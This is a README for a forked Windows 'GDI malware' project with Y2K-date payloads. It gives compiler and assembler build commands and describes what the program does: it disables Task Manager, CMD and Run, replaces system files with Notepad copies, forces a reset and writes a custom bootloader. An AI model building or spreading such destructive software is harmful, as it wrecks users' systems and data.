#+TITLE: Y2K GDI Malware A fork of a [[https://github.com/LunzRh/Y2K.EXE][malware]] created by [[https://github.com/LunzRh][Jotaxisz]] with a reworked source structure (minor changes). To run this malware you need a Windows XP macchine with date set to <2000-01-01> or <2000-01-02> wich will change the payload. * Building ** On Linux You will need *MinGW* and *Make*. You can parse the argument =CXX= to change the C++ compiler (the default is ~i686-w64-mingw-g++~) and the =WINDRES= to change the default ~windres~ command (the default is ~i686-w64-mingw-windres~). Others arguments are =NASM= and =LD= for changing the nasm and ld commands. You can change the =CXX= and =WINDRES= and =LD= to ~x86_64-w64-mingw-g++~ and ~x86_64-w64-mingw-windres~ and ~x86_64-w64-mingw32-ld~ respectively to build it natively for 64bit envioriments. *** Arch linux: #+BEGIN_SRC shell pacman -S make mingw-w64 nasm make #+END_SRC *** Ubuntu #+BEGIN_SRC shell apt install make mingw-w64 nasm make #+END_SRC You can also execute ~make clean~ to clean =bin/= folder, =.o= files on =res/= and =.bin= and =.o= files on folder =mbr/=. ** On Windows You will need to install [[https://sourceforge.net/projects/mingw/][MinGW]] or another C++ compiler and [[https://nasm.us/][NASM]]. Then run the command: #+BEGIN_SRC batch windres -o res\resource.o res\resource.rc nasm -o mbr\bootloader.bin mbr\bootloader.asm ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K #+END_SRC * Bootloader This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found [[src/mbr/][here]]. * Payloads If you execute the malware at any date it will always disable the Task Manager, CMD, Execute and Power Options. ** <2000-01-01> This payload will start the =res/alarm.wav= and then start the GDI part and replace multiples system files with copies of Notepad executables, after the visual payload ended after forcing reseting the machine the bootloader payload will start. ** <2000-01-02> This payload will start the =res/jeff_syndicate_hip_hop.wav=.